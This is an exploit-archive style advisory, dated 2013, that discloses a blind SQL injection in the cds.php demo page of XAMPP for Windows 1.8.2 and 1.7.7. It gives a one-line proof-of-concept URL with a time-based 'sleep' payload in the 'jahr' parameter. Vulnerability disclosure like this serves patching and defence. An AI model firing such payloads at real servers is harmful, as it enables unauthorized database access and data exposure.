# Exploit Title: XAMPP for Windows 1.8.2 Blind Sql Injection# Date: 2013/10/28# Exploit Author: Sebastián Magof# Vendor Homepage: apachefriends.org# Software Link: apachefriends.org/en/xampp-windows.html# Version:1.8.2/1.7.7# Tested on: Windows# Twitter: @smagof#Greetz: Family, Friends && Under guys;#Special Greetz: My Alpha (:#Description:XAMPP is a platform-independent server, free software, which
mainly consists of the MySQL database, the Apache web server and
interpreters for scripting languages: PHP and Perl. The name comes from
the acronym for X, Apache, MySQL, PHP, Perl.#Sql-Injection: An attacker may execute arbitrary SQL statements on the
vulnerable system. This may compromise the integrity of your database
and/or expose sensitive information.#Vulnerable file: cds.php#Parameter: "jahr="#Exploit:
http://127.0.0.1/xampp/cds.php?jahr=1967 AND
sleep(3)&interpret=1&titel=555-666-0606
# (\/)# (**)#(")(")
